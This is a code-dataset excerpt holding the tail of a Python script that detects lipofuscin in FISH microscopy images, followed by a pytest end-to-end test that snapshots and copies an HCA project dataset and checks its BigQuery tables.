'Lipofuscin ROIs',\n shape_type = 'polygon', opacity = 1, face_color = 'white', \n edge_color = 'blue', edge_width = 3)\n\n# %% Save lipofuscin rois from viewer\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17'\nsave_file = 'HCR_10.17_S2_lipofuscin_rois_in_cells.pkl'\n\nl_rois = viewer.layers['Lipofuscin ROIs'].data\n\nwith open('{0}\\\\{1}'.format(save_loc, save_file), 'wb') as f:\n pkl.dump(l_rois, f) \n\n# %% Get pixels in cell ROIs\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17'\n# save_file = 'S2_cell_pixels.pkl'\nsave_file = 'S2_mask_vertices.pkl'\n\ntry:\n with open('{0}\\\\{1}'.format(save_loc, save_file), 'rb') as f:\n mask_vertices = pkl.load(f)\n cells = mask_vertices.keys()\n x = 0\n all_cell_pixels = np.zeros([1, 3])\n for cell in cells:\n data = Cell.cell_data[cell]\n planes = data['z_planes']\n for plane in planes:\n xvals = np.reshape(mask_vertices[cell][plane][0], [-1, 1])\n yvals = np.reshape(mask_vertices[cell][plane][1], [-1, 1])\n zvals = np.ones([len(xvals), 1])*plane\n coords = np.concatenate((zvals, xvals, yvals), axis = 1)\n all_cell_pixels = np.concatenate((all_cell_pixels, coords), axis = 0)\n \n all_cell_pixels = all_cell_pixels[1:, :].astype(int)\n \n print('Data loaded')\n \nexcept IOError:\n print('No saved data found, calculating mask pixels')\n c_rois = viewer.layers['Cell masks'].data\n px = pixels_in_roi.pixels_in_roi(h, w, n, c_rois)\n all_cell_pixels = px['all_pixels']\n cell_pixels_roi = px['pixels_roi']\n with open('{0}{1}{2}'.format(save_loc, sep, save_file), 'wb') as f:\n pkl.dump({'all_cell_pixels': all_cell_pixels, 'cell_pixels_roi': cell_pixels_roi}, f)\n# px = pixels_in_roi.pixels_in_roi(h, w, l_rois)\n# all_cell_pixels = px['all_pixels']\n\n\n# %% Get pixels in lipofuscin ROIs\n\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17'\nsave_file = 'HCR_10.17_S2_lipofuscin_pixels_in_cells.pkl'\n \ntry:\n with open('{0}{1}{2}'.format(save_loc, sep, save_file), 'rb') as f:\n mask_vertices = pkl.load(f)\n all_lipo_pixels = mask_vertices['all_lipo_pixels']\n lipo_pixels_roi = mask_vertices['lipo_pixels_roi']\n print('Data loaded')\n \nexcept IOError:\n print('No saved data found, calculating mask pixels')\n px = pixels_in_roi.pixels_in_roi(h, w, n, l_rois)\n all_lipo_pixels = px['all_pixels']\n lipo_pixels_roi = px['pixels_roi']\n with open('{0}{1}{2}'.format(save_loc, sep, save_file), 'wb') as f:\n pkl.dump({'all_lipo_pixels': all_lipo_pixels, 'lipo_pixels_roi': lipo_pixels_roi}, f)\n \n# %% Get background \nwith open('{0}\\\\S2_background_ndnf_sst_vip.pkl'.format(save_loc), 'rb') as f:\n dict = pkl.load(f)\n \navg_bg_ndnf = dict['Ndnf'] \navg_bg_sst = dict['Sst'] \navg_bg_vip = dict['Vip'] \n \n\n\n# %% Filter images with difference of gaussians to amplify lipofuscin-sized spots\n\nsigma_small = 2\nsigma_large = 5\n\nt0 = time.time() \n\nimg = im_array_ndnf\nim_diff_ndnf = diff_gauss.diff_gauss(sigma_small, sigma_large, img, do_plot = 1)\nt1 = time.time() - t0\nprint('{0} seconds'.format(int(t1)))\n\nimg = im_array_sst\nim_diff_sst = diff_gauss.diff_gauss(sigma_small, sigma_large, img, do_plot = 0)\nt1 = time.time() - t0\nprint('{0} seconds'.format(int(t1)))\n\nimg = im_array_vip\nim_diff_vip = diff_gauss.diff_gauss(sigma_small, sigma_large, img, do_plot = 0)\nt1 = time.time() - t0\nprint('{0} seconds'.format(int(t1)))\n\n# %% \nviewer.add_image(data = im_diff_ndnf, name = 'Diff ndnf', colormap = 'magenta', blending = 'additive')\nviewer.add_image(data = im_diff_sst, name = 'Diff Sst', colormap = 'green', blending = 'additive')\nviewer.add_image(data = im_diff_vip, name = 'Diff Vip', colormap = 'yellow', blending = 'additive')\n\n# %% Plot histogram of filtered images cell pixels and lipofuscin pixels\n\n#img_dict = {'Ndnf': im_diff_ndnf, 'Sst': im_diff_sst, 'Vip': im_diff_vip}\nimg_dict = {'Ndnf': im_array_ndnf, 'Sst': im_array_sst, 'Vip': im_array_vip}\n\npixels_dict = {'Cells': all_cell_pixels, 'Lipofuscin': all_lipo_pixels}\n#pixels_dict = {'Cells': all_cell_pixels}\ncolors_dict = {'Cells': 'b', 'Lipofuscin': 'k'}\n#title = 'Diff gauss sigma = ({0}, {1})'.format(sigma_small, sigma_large)\ntitle = 'Raw images'\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_scatter_plots'\nsave_file = '{0} hist lipo + cells.png'.format(title)\n#save_file = '{0} hist cells.png'.format(title)\n\nhist_channels.hist_channels(img_dict, pixels_dict, max_per_group= 100000, colors_dict = colors_dict, \n title = title, save = True, save_loc = save_loc, save_file = save_file)\n\ndel img_dict\ndel pixels_dict\n\n# %% Binarize filtered images cell pixels and lipofuscin pixels\n\nimg_dict = {'Ndnf': im_diff_ndnf, 'Sst': im_diff_sst, 'Vip': im_diff_vip}\n#img_dict = {'Ndnf': im_array_ndnf, 'Sst': im_array_sst, 'Vip': im_array_vip}\n\npixels_dict = {'Cells': all_cell_pixels, 'Lipofuscin': all_lipo_pixels}\n#pixels_dict = {'Cells': all_cell_pixels}\ncolors_dict = {'Cells': 'b', 'Lipofuscin': 'k'}\ntitle = 'Diff gauss sigma = ({0}, {1})'.format(sigma_small, sigma_large)\n#title = 'Raw images'\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_scatter_plots'\nsave_file = '{0} hist lipo + cells.png'.format(title)\n#save_file = '{0} hist cells.png'.format(title)\n\nthresh_scale = 1\n\nthresh = hist_channels.hist_channels(img_dict, pixels_dict, max_per_group= 100000, \n do_bin = True, bin_group = 'Cells', thresh_scale = thresh_scale,\n colors_dict = colors_dict, \n title = title, save = True, save_loc = save_loc, save_file = save_file)\n\ndel img_dict\ndel pixels_dict\n\nim_bin_ndnf = np.zeros(im_diff_ndnf.shape)\nim_bin_sst = np.zeros(im_diff_ndnf.shape)\nim_bin_vip = np.zeros(im_diff_ndnf.shape)\n\nix_ndnf = np.where(im_diff_ndnf > thresh['Ndnf'])\nix_sst = np.where(im_diff_sst > thresh['Sst'])\nix_vip = np.where(im_diff_vip > thresh['Vip'])\n\nim_bin_ndnf[ix_ndnf] = im_diff_ndnf[ix_ndnf]\nim_bin_sst[ix_sst] = im_diff_sst[ix_sst]\nim_bin_vip[ix_vip] = im_diff_vip[ix_vip]\n\n# %% Find mahalanobis distance of pixels from lipofuscin cloud (in binarized images)\n\nimg_dict = {'Ndnf': im_bin_ndnf, 'Sst': im_bin_sst, 'Vip': im_bin_vip}\n#img_dict = {'Ndnf': im_diff_ndnf, 'Sst': im_diff_sst, 'Vip': im_diff_vip}\n#img_dict = {'Ndnf': im_array_ndnf, 'Sst': im_array_sst, 'Vip': im_array_vip}\n\npixels_dict = {'Cells': all_cell_pixels, 'Lipofuscin': all_lipo_pixels}\n\norigin_group = 'Lipofuscin'\nbin_group = 'Cells'\n\ncolors_dict = {'Cells': 'b', 'Lipofuscin': 'k'}\n\ntitle = 'Diff gauss sigma = ({0}, {1}); binarized above {2} std from median'.format(sigma_small, sigma_large, thresh_scale)\n#title = 'Raw images'\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_scatter_plots'\nsave_file = '{0} hist lipo + cells.png'.format(title)\n#save_file = '{0} hist cells.png'.format(title)\n\noutput = m_dist.m_dist(img_dict, pixels_dict, origin_group, bin_group, colors_dict = colors_dict, thresh_scale = 0,\n title = title, save = True, save_loc = save_loc, save_file = save_file)\n\nm_dist_vals = output['m_dist']\nthresh = output['thresh']\n\n# %% Use mahalanobis distance to label all lipofuscin pixels in image (based on threshold)\n\nlipo_pixels = all_cell_pixels[m_dist_vals['Cells'] < thresh, :]\ncell_pixels = all_cell_pixels[m_dist_vals['Cells'] > thresh, :]\n\nim_array_lipo = np.zeros(im_array_gad1.shape)\nim_array_lipo[lipo_pixels[:, 0], lipo_pixels[:, 1], lipo_pixels[:, 2]] = np.ones(lipo_pixels.shape[0])\n\nviewer.add_image(data = im_array_lipo, name = 'Detected lipofuscin', colormap = 'gray', blending = 'additive')\n\n\n\n# %% Make scatter plots of images with different filters\n\nimg_dict = {'Ndnf': im_bin_ndnf, 'Sst': im_bin_sst, 'Vip': im_bin_vip}\n#img_dict = {'Ndnf': im_diff_ndnf, 'Sst': im_diff_sst, 'Vip': im_diff_vip}\n#img_dict = {'Ndnf': im_array_ndnf, 'Sst': im_array_sst, 'Vip': im_array_vip}\n\npixels_dict = {'Cells': all_cell_pixels, 'Lipofuscin': all_lipo_pixels}\n#pixels_dict = {'Cells': all_cell_pixels}\ncolors_dict = {'Cells': 'b', 'Lipofuscin': 'k'}\ntitle = 'Diff gauss sigma = ({0}, {1}); binarized above {2} std from median'.format(sigma_small, sigma_large, thresh_scale)\n#title = 'Raw images'\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_scatter_plots'\nsave_file = '{0} scatter lipo + cells.png'.format(title)\n#save_file = '{0} scatter cells.png'.format(title)\n\nscatter_channels.scatter_channels(img_dict, pixels_dict, max_per_group= 100000, colors_dict = colors_dict, \n title = title, save = True, save_loc = save_loc, save_file = save_file)\n\ndel img_dict\ndel pixels_dict\n\n# %% Make 3D scatter plots of images with different filters\n\nimg_dict = {'Ndnf': im_bin_ndnf, 'Sst': im_bin_sst, 'Vip': im_bin_vip}\n#img_dict = {'Ndnf': im_diff_ndnf, 'Sst': im_diff_sst, 'Vip': im_diff_vip}\n#img_dict = {'Ndnf': im_array_ndnf, 'Sst': im_array_sst, 'Vip': im_array_vip}\n\npixels_dict = {'Cells': all_cell_pixels, 'Lipofuscin': all_lipo_pixels}\n#pixels_dict = {'Cells': all_cell_pixels}\n#pixels_dict = {'Lipofuscin': all_lipo_pixels}\n\n\n#colors_dict = {'Cells': 'b', 'Lipofuscin': 'k'}\n#colors_dict = {'Cells': m_dist_vals['Cells'], 'Lipofuscin': m_dist_vals['Lipofuscin']}\ncolors_dict = {'Cells': np.log(m_dist_vals['Cells']), 'Lipofuscin': 'r'}\n\ntitle = 'Sub-sampled diff gauss sigma = ({0}, {1}) \\n binarized above {2} std from median \\n color = mahalanobis distance from lipofuscin pixels'.format(sigma_small, sigma_large, thresh_scale)\n#title = 'Raw images'\n\nsave_loc = 'G:\\\\Shared drives\\\\as_share\\\\HCR\\\\HCR_10.17\\\\S2_scatter_plots'\nsave_file = '{0} 3D scatter lipo + cells.png'.format(title)\n#save_file = '{0} 3D scatter cells.png'.format(title)\n\nscatter_channels.scatter_channels(img_dict, pixels_dict, max_per_group= 100000, colors_dict = colors_dict,\n make_3D = True,\n title = title, save = True, save_loc = save_loc, save_file = save_file)\n\ndel img_dict\ndel pixels_dict\n\n# %% Subtract background\nx = 0\nidx1 = 0\nidx2 = 0\nfor cell in cells:\n data = Cell.cell_data[cell]\n planes = data['z_planes']\n \n for plane in planes:\n xvals = mask_vertices[cell][plane][0]\n idx2 = idx1 + len(xvals)\n cells_ndnf[idx1:idx2] = cells_ndnf[idx1:idx2] - avg_bg_ndnf[x]\n cells_sst[idx1:idx2] = cells_sst[idx1:idx2] - avg_bg_sst[x]\n cells_vip[idx1:idx2] = cells_vip[idx1:idx2] - avg_bg_vip[x]\n idx1 = idx2 \n\n x += 1\n \n\n\n", "repo_name": "amrita112/FISH-Image-Analysis", "sub_path": "old/Lipofuscin_removal.py", "file_name": "Lipofuscin_removal.py", "file_ext": "py", "file_size_in_byte": 15444, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "IPython.get_ipython", "line_number": 10, "usage_type": "call"}, {"api_name": "time.time", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 43, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 54, "usage_type": "call"}, {"api_name": "time.time", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 56, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 57, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 58, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 58, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 59, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 71, "usage_type": "call"}, {"api_name": "napari.Viewer", "line_number": 84, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pickle.load", "line_number": 96, "usage_type": "call"}, {"api_name": "Cell.cell_data.keys", "line_number": 97, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 98, "usage_type": "call"}, {"api_name": "Cell.cell_data_temp", "line_number": 100, "usage_type": "attribute"}, {"api_name": "Cell.cell_data_temp", "line_number": 102, "usage_type": "attribute"}, {"api_name": "Cell.cell_data", "line_number": 102, "usage_type": "attribute"}, {"api_name": "Cell.cell_data_temp", "line_number": 103, "usage_type": "attribute"}, {"api_name": "Cell.cell_data", "line_number": 104, "usage_type": "attribute"}, {"api_name": "Cell.cell_data_temp", "line_number": 104, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 106, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 106, "usage_type": "attribute"}, {"api_name": "Cell.n_cells", "line_number": 107, "usage_type": "attribute"}, {"api_name": "Cell.n_cells", "line_number": 109, "usage_type": "attribute"}, {"api_name": "Cell.n_cells", "line_number": 110, "usage_type": "attribute"}, {"api_name": "Cell.cell_data.keys", "line_number": 119, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.mod", "line_number": 121, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 123, "usage_type": "attribute"}, {"api_name": "Cell.cell_data", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 126, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 135, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 151, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 160, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 163, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.reshape", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 170, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 172, "usage_type": "call"}, {"api_name": "pixels_in_roi.pixels_in_roi", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path.sep", "line_number": 184, "usage_type": "argument"}, {"api_name": "pickle.dump", "line_number": 185, "usage_type": "call"}, {"api_name": "os.path.sep", "line_number": 196, "usage_type": "argument"}, {"api_name": "pickle.load", "line_number": 197, "usage_type": "call"}, {"api_name": "pixels_in_roi.pixels_in_roi", "line_number": 204, "usage_type": "call"}, {"api_name": "os.path.sep", "line_number": 207, "usage_type": "argument"}, {"api_name": "pickle.dump", "line_number": 208, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 212, "usage_type": "call"}, {"api_name": "time.time", "line_number": 225, "usage_type": "call"}, {"api_name": "diff_gauss.diff_gauss", "line_number": 228, "usage_type": "call"}, {"api_name": "time.time", "line_number": 229, "usage_type": "call"}, {"api_name": "diff_gauss.diff_gauss", "line_number": 233, "usage_type": "call"}, {"api_name": "time.time", "line_number": 234, "usage_type": "call"}, {"api_name": "diff_gauss.diff_gauss", "line_number": 238, "usage_type": "call"}, {"api_name": "time.time", "line_number": 239, "usage_type": "call"}, {"api_name": "hist_channels.hist_channels", "line_number": 261, "usage_type": "call"}, {"api_name": "hist_channels.hist_channels", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 291, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 295, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 297, "usage_type": "call"}, {"api_name": "m_dist.m_dist", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 333, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 334, "usage_type": "call"}, {"api_name": "scatter_channels.scatter_channels", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.log", "line_number": 374, "usage_type": "call"}, {"api_name": "scatter_channels.scatter_channels", "line_number": 383, "usage_type": "call"}, {"api_name": "Cell.cell_data", "line_number": 395, "usage_type": "attribute"}]} +{"seq_id": "14546025649", "text": "import logging\n\nimport pytest\nfrom dagster import (\n PipelineExecutionResult,\n ResourceDefinition,\n execute_pipeline,\n in_process_executor,\n)\nfrom dagster_gcp.gcs import gcs_pickle_io_manager\nfrom dagster_utils.contrib.data_repo.jobs import poll_job\nfrom dagster_utils.resources.data_repo.jade_data_repo import jade_data_repo_client\nfrom dagster_utils.resources.google_storage import google_storage_client\nfrom dagster_utils.resources.sam import sam_client\nfrom dagster_utils.resources.slack import console_slack_client\nfrom data_repo_client import RepositoryApi\nfrom google.cloud.bigquery import Client\n\n# isort: split\n\nfrom hca_orchestration.config import preconfigure_resource_for_mode\nfrom hca_orchestration.pipelines.cut_snapshot import cut_snapshot\nfrom hca_orchestration.repositories.local_repository import (\n copy_project_to_new_dataset_job,\n load_hca_job,\n)\nfrom hca_orchestration.resources.config.dagit import dagit_config\nfrom hca_orchestration.resources.config.data_repo import (\n SnapshotCreationConfig,\n hca_manage_config,\n)\nfrom hca_orchestration.resources.data_repo_service import data_repo_service\nfrom hca_orchestration.tests.e2e.conftest import DatasetInfo\nfrom hca_orchestration.tests.support.bigquery import (\n assert_data_loaded,\n assert_metadata_loaded,\n exec_query,\n query_metadata_table,\n)\n\n\n@pytest.fixture\ndef snapshot(monkeypatch, hca_project_id, load_hca_run_config,\n dataset_info: DatasetInfo, data_repo_client: RepositoryApi):\n monkeypatch.setenv(\"ENV\", \"dev\")\n\n load_job = load_hca_job()\n execute_pipeline(\n load_job,\n run_config=load_hca_run_config\n )\n\n snapshot_config = {\n \"resources\": {\n \"snapshot_config\": {\n \"config\": {\n \"managed_access\": False,\n \"qualifier\": None\n }\n },\n },\n \"solids\": {\n \"submit_snapshot_job\": {\n \"config\": {\n # we are using a snapshot name for testing that\n # will not pass our validation regex\n \"validate_snapshot_name\": False\n }\n },\n \"add_steward\": {\n \"config\": {\n \"snapshot_steward\": \"monster-dev@dev.test.firecloud.org\"\n }\n }\n }\n }\n creation_config = SnapshotCreationConfig(\n dataset_info.dataset_name,\n f\"{dataset_info.dataset_name}_snapshot_test\",\n \"\",\n False\n )\n snapshot_job = cut_snapshot.to_job(\n resource_defs={\n \"data_repo_client\": preconfigure_resource_for_mode(jade_data_repo_client, \"dev\"),\n \"data_repo_service\": data_repo_service,\n \"gcs\": google_storage_client,\n \"hca_manage_config\": preconfigure_resource_for_mode(hca_manage_config, \"dev\"),\n \"io_manager\": preconfigure_resource_for_mode(gcs_pickle_io_manager, \"dev\"),\n \"sam_client\": preconfigure_resource_for_mode(sam_client, \"dev\"),\n \"slack\": console_slack_client,\n \"snapshot_config\": ResourceDefinition.hardcoded_resource(creation_config),\n \"dagit_config\": preconfigure_resource_for_mode(dagit_config, \"dev\"),\n },\n executor_def=in_process_executor\n )\n\n snapshot_job_result = execute_pipeline(snapshot_job, run_config=snapshot_config)\n snapshot_info = snapshot_job_result.result_for_solid(\n \"get_completed_snapshot_info\").materializations_during_compute[0]\n\n yield snapshot_info\n\n # clean up the snapshot when finished\n logging.info(\n f\"Deleting snapshot, name = {snapshot_info.tags['snapshot_name']}, id = {snapshot_info.tags['snapshot_id']}\")\n response = data_repo_client.delete_snapshot(id=snapshot_info.tags[\"snapshot_id\"])\n poll_job(response.id, 300, 2, data_repo_client)\n\n\n@pytest.fixture\ndef copied_dataset(snapshot, copy_project_config, hca_project_id: str, data_repo_client: RepositoryApi):\n base_copy_project_config = copy_project_config.copy()\n base_copy_project_config[\"resources\"][\"hca_project_copying_config\"] = {\n \"config\": {\n \"source_bigquery_project_id\": snapshot.tags['data_project'],\n \"source_bigquery_region\": \"US\",\n \"source_snapshot_name\": snapshot.tags['snapshot_name']\n }\n }\n base_copy_project_config[\"resources\"][\"hca_project_id\"] = {\n \"config\": {\n \"hca_project_id\": hca_project_id,\n }\n }\n copy_project_job = copy_project_to_new_dataset_job(\"dev\", \"dev\")\n result: PipelineExecutionResult = execute_pipeline(\n copy_project_job,\n run_config=base_copy_project_config\n )\n copied_dataset = result.result_for_solid(\"validate_copied_dataset\").materializations_during_compute[0]\n\n yield copied_dataset\n\n # clean up the copied dataset when finished\n logging.info(f\"Deleting copied dataset, id = {copied_dataset.tags['dataset_id']}\")\n response = data_repo_client.delete_dataset(id=copied_dataset.tags[\"dataset_id\"])\n poll_job(response.id, 600, 2, data_repo_client)\n\n\n@pytest.mark.e2e\ndef test_copy_project(hca_project_id, copied_dataset, tdr_bigquery_client: Client): # (copied_dataset,\n copied_dataset_bq_project = copied_dataset.tags['project_id']\n copied_dataset_name = copied_dataset.tags['dataset_name']\n\n assert_metadata_loaded(\"links\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"analysis_file\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"analysis_protocol\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"cell_suspension\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"collection_protocol\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"donor_organism\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"enrichment_protocol\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\n \"library_preparation_protocol\",\n copied_dataset_name,\n copied_dataset_bq_project,\n tdr_bigquery_client)\n assert_metadata_loaded(\"process\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\"project\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n assert_metadata_loaded(\n \"specimen_from_organism\",\n copied_dataset_name,\n copied_dataset_bq_project,\n tdr_bigquery_client)\n assert_data_loaded(\"analysis_file\", copied_dataset_name, copied_dataset_bq_project, tdr_bigquery_client)\n\n assert_single_project_loaded(hca_project_id, copied_dataset_name, copied_dataset_bq_project,\n tdr_bigquery_client)\n\n\ndef assert_single_project_loaded(project_id: str, dataset_name: str, bq_project: str, client: Client):\n query = f\"\"\"\n SELECT * FROM `datarepo_{dataset_name}.project` WHERE project_id = '{project_id}'\n \"\"\"\n\n entity_loaded = exec_query(query, client, bq_project)\n assert len(entity_loaded) == 1, f\"Should have loaded project with id {project_id}\"\n\n total_rows_loaded = query_metadata_table(\"project\", dataset_name, bq_project, client)\n assert len(total_rows_loaded) == 1, f\"Should have 1 row in project table, found {len(total_rows_loaded)}\"\n\n links_rows = query_metadata_table(\"links\", dataset_name, bq_project, client)\n for row in links_rows:\n assert row[\"project_id\"] == project_id, \\\n f\"Should only have rows for project_id {project_id} in links table,\"\\\n f\"found row for project_id {row['project_id']}\"\n", "repo_name": "DataBiosphere/hca-ingest", "sub_path": "orchestration/hca_orchestration/tests/e2e/test_copy_project.py", "file_name": "test_copy_project.py", "file_ext": "py", "file_size_in_byte": 7816, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "hca_orchestration.tests.e2e.conftest.DatasetInfo", "line_number": 44, "usage_type": "name"}, {"api_name": "data_repo_client.RepositoryApi", "line_number": 44, "usage_type": "name"}, {"api_name": "hca_orchestration.repositories.local_repository.load_hca_job", "line_number": 47, "usage_type": "call"}, {"api_name": "dagster.execute_pipeline", "line_number": 48, "usage_type": "call"}, {"api_name": "hca_orchestration.resources.config.data_repo.SnapshotCreationConfig", "line_number": 77, "usage_type": "call"}, {"api_name": "hca_orchestration.pipelines.cut_snapshot.cut_snapshot.to_job", "line_number": 83, "usage_type": "call"}, {"api_name": "hca_orchestration.pipelines.cut_snapshot.cut_snapshot", "line_number": 83, "usage_type": "name"}, {"api_name": "hca_orchestration.config.preconfigure_resource_for_mode", "line_number": 85, "usage_type": "call"}, {"api_name": "dagster_utils.resources.data_repo.jade_data_repo.jade_data_repo_client", "line_number": 85, "usage_type": "argument"}, {"api_name": "hca_orchestration.resources.data_repo_service.data_repo_service", "line_number": 86, "usage_type": "name"}, {"api_name": "dagster_utils.resources.google_storage.google_storage_client", "line_number": 87, "usage_type": "name"}, {"api_name": "hca_orchestration.config.preconfigure_resource_for_mode", "line_number": 88, "usage_type": "call"}, {"api_name": "hca_orchestration.resources.config.data_repo.hca_manage_config", "line_number": 88, "usage_type": "argument"}, {"api_name": "hca_orchestration.config.preconfigure_resource_for_mode", "line_number": 89, "usage_type": "call"}, {"api_name": "dagster_gcp.gcs.gcs_pickle_io_manager", "line_number": 89, "usage_type": "argument"}, {"api_name": "hca_orchestration.config.preconfigure_resource_for_mode", "line_number": 90, "usage_type": "call"}, {"api_name": "dagster_utils.resources.sam.sam_client", "line_number": 90, "usage_type": "argument"}, {"api_name": "dagster_utils.resources.slack.console_slack_client", "line_number": 91, "usage_type": "name"}, {"api_name": "dagster.ResourceDefinition.hardcoded_resource", "line_number": 92, "usage_type": "call"}, {"api_name": "dagster.ResourceDefinition", "line_number": 92, "usage_type": "name"}, {"api_name": "hca_orchestration.config.preconfigure_resource_for_mode", "line_number": 93, "usage_type": "call"}, {"api_name": "hca_orchestration.resources.config.dagit.dagit_config", "line_number": 93, "usage_type": "argument"}, {"api_name": "dagster.in_process_executor", "line_number": 95, "usage_type": "name"}, {"api_name": "dagster.execute_pipeline", "line_number": 98, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 105, "usage_type": "call"}, {"api_name": "data_repo_client.delete_snapshot", "line_number": 107, "usage_type": "call"}, {"api_name": "dagster_utils.contrib.data_repo.jobs.poll_job", "line_number": 108, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 42, "usage_type": "attribute"}, {"api_name": "data_repo_client.RepositoryApi", "line_number": 112, "usage_type": "name"}, {"api_name": "hca_orchestration.repositories.local_repository.copy_project_to_new_dataset_job", "line_number": 126, "usage_type": "call"}, {"api_name": "dagster.PipelineExecutionResult", "line_number": 127, "usage_type": "name"}, {"api_name": "dagster.execute_pipeline", "line_number": 127, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 136, "usage_type": "call"}, {"api_name": "data_repo_client.delete_dataset", "line_number": 137, "usage_type": "call"}, {"api_name": "dagster_utils.contrib.data_repo.jobs.poll_job", "line_number": 138, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 111, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.Client", "line_number": 142, "usage_type": "name"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 146, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 147, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 148, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 149, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 150, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 151, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 152, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 153, "usage_type": "call"}, {"api_name": "hca_orchestration.tests.support.bigquery.assert_metadata_loaded", "line_number": 158, "usage_type": "call"}, {"api_name": 